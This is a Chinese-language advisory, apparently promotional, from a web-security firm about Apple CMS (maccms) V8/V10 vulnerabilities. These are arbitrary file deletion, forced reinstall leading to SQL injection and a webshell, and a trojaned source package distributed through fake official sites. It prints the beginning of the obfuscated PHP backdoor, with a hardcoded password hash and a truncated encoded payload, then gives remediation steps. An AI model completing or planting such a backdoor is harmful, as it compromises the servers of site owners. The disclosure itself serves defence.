域名預(yù)訂/競(jìng)價(jià),好“米”不錯(cuò)過(guò)
目前蘋(píng)果CMS官方在不斷的升級(jí)補(bǔ)丁,官方最新的漏洞補(bǔ)丁對(duì)于目前爆發(fā)的新漏洞沒(méi)有任何效果。更新補(bǔ)丁的用戶網(wǎng)站還是會(huì)遭受到掛馬的攻擊,很多客戶因此找到我們SINE安全尋求網(wǎng)站安全技術(shù)上的支持,針對(duì)該漏洞我們有著獨(dú)特的安全解決方案以及防止掛馬攻擊的防護(hù),包括一些未公開(kāi)的maccms POC漏洞都有修復(fù)補(bǔ)丁。
目前maccms官方被百度網(wǎng)址安全中心提醒您:該站點(diǎn)可能受到黑客攻擊,部分頁(yè)面已被非法篡改! 蘋(píng)果官方網(wǎng)站因?yàn)樘厥庠蛞呀?jīng)停止訪問(wèn),該內(nèi)容被禁止訪問(wèn),但是升級(jí)補(bǔ)丁更新的網(wǎng)址還是可以打開(kāi)的。
截圖如下:
蘋(píng)果CMS漏洞詳情:
蘋(píng)果CMS V8 V10版本存在代碼重裝漏洞,以及代碼后門(mén)漏洞,任意文件刪除漏洞,通過(guò)CNVD-2019-43865的信息安全漏洞通報(bào),可以確認(rèn)maccms V10存在漏洞,可以偽造惡意代碼發(fā)送到網(wǎng)站后端進(jìn)行執(zhí)行,可以刪除網(wǎng)站目錄下的任意文件,可刪除重裝蘋(píng)果CMS系統(tǒng)的配置文件,導(dǎo)致可以重新安裝maccms系統(tǒng),并在安裝過(guò)程中插入sql注入代碼到數(shù)據(jù)庫(kù)中去執(zhí)行并獲取webshell以及服務(wù)器權(quán)限。
蘋(píng)果CMS V8 V10 源代碼存在后門(mén)漏洞,經(jīng)過(guò)我們SINE安全技術(shù)的檢測(cè)發(fā)現(xiàn),存在后門(mén)的原因是,目前百度搜索蘋(píng)果官網(wǎng),maccms官方,排在百度搜索首頁(yè)的都是仿冒的網(wǎng)站,真正官網(wǎng)地址是www.maccms.com,包括模板,圖片,以及CSS跟真正的官方是一模一樣,很多客戶都是點(diǎn)擊到這個(gè)山寨網(wǎng)站上去進(jìn)行下載的源代碼,該代碼里隱藏了木馬后門(mén)文件,阿里云都無(wú)法檢測(cè)出來(lái),
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..
define('Viv, bebegim.','Denzel-你的英雄'); // 標(biāo)題
function s(){
$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s
7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323
代碼如上面所示,是加密過(guò)的,經(jīng)過(guò)我們SINE安全的解密發(fā)現(xiàn)是PHP的腳本木馬,可以繞過(guò)各大服務(wù)器廠商的安全檢測(cè),包括阿里云,騰訊云,百度云,華為云。
關(guān)于蘋(píng)果CMS網(wǎng)站漏洞的修復(fù)方案與辦法
對(duì)任意文件刪除漏洞做安全過(guò)濾與檢查,防止del刪除的語(yǔ)句的執(zhí)行,對(duì)前端傳輸過(guò)來(lái)的參數(shù)進(jìn)行嚴(yán)格的檢測(cè),不管是get,post,cookies,如果您對(duì)代碼不是太懂的話也可以找專業(yè)的網(wǎng)站安全公司來(lái)處理解決蘋(píng)果CMS網(wǎng)站被攻擊的問(wèn)題,或者是對(duì)重裝文件進(jìn)行改名以及安裝配置文件進(jìn)行權(quán)限設(shè)置,只讀權(quán)限,對(duì)于存在網(wǎng)站木馬后門(mén)的蘋(píng)果cms系統(tǒng),人工對(duì)代碼進(jìn)行安全審計(jì),對(duì)所有網(wǎng)站目錄下每個(gè)代碼文件都要仔細(xì)的排查,可以下載官方的源代碼進(jìn)行比對(duì)。
申請(qǐng)創(chuàng)業(yè)報(bào)道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!